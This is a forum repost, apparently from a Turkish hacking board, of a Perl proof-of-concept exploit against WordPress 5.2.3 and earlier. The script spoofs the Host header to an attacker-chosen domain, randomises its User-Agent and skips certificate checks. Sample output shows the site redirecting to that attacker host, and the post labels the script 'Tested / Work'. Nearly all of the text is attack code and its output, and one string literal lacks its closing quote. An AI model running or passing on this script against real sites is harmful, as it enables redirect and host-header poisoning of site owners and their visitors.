.
Author: Todor DonevType: Remote
Platform: .php
Date: 09-09-2019
Kod:
[CENTER]
#!/usr/bin/perl -w
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;
my $host = shift || '';
my $attacker = shift || 'default-vhost.com';
say "# Wordpress <= 5.2.3 Remote Cross Site Host Modification Proof Of Concept Patch Exploit
# ====================================================================================
if ($host !~ m/^http/){
say "# e.g. perl $0 https://target:port/ default-vhost.com";
exit;
}
my $user_agent = rand_ua("browsers");
my $browser = LWP::UserAgent->new(
protocols_allowed => ['http', 'https'],
ssl_opts => { verify_hostname => 0 }
);
$browser->timeout(10);
$browser->agent($user_agent);
my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], " ");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
say "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# > $_ => ", $request->header($_) for $request->header_field_names;
say "# < $_ => ", $response->header($_) for $response->header_field_names;
say "# ====================================================================================";
# # ====================================================================================
# # > Host => default-vhost.com
# # > User-Agent => Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)
# # > Content-Type => application/x-www-form-urlencoded
# # < Connection => close
# # < Date => Fri, 06 Sep 2019 11:39:43 GMT
# # < ******** => https://default-vhost.com/
# # < Server => nginx
# # < Content-Type => text/html; charset=UTF-8
# # < Client-Date => Fri, 06 Sep 2019 11:39:43 GMT
# # < Client-Peer => 13.37.13.37:443
# # < Client-Response-Num => 1
# # < Client-SSL-Cert-Issuer => /C=US/O=Let's Encrypt/CN=Let's Encrypt Authority X3
# # < Client-SSL-Cert-Subject => /CN=default-vhost.com
# # < Client-SSL-Cipher => ECDHE-RSA-AES256-GCM-SHA384
# # < Client-SSL-Socket-Class => IO::Socket::SSL
# # < Client-SSL-Warning => Peer certificate not verified
# # < Client-Transfer-Encoding => chunked
# # < Strict-Transport-Security => max-age=31536000;
# # < X-Powered-By => PHP/7.3.9
# # < X-Redirect-By => WordPress
# # ====================================================================================
# TurkHackTeam - KayraErkanEsen | İnfo - Tested / Work #
[/CENTER]
.
Id: 33219
Full Patch: 10 Coin
Son düzenleme: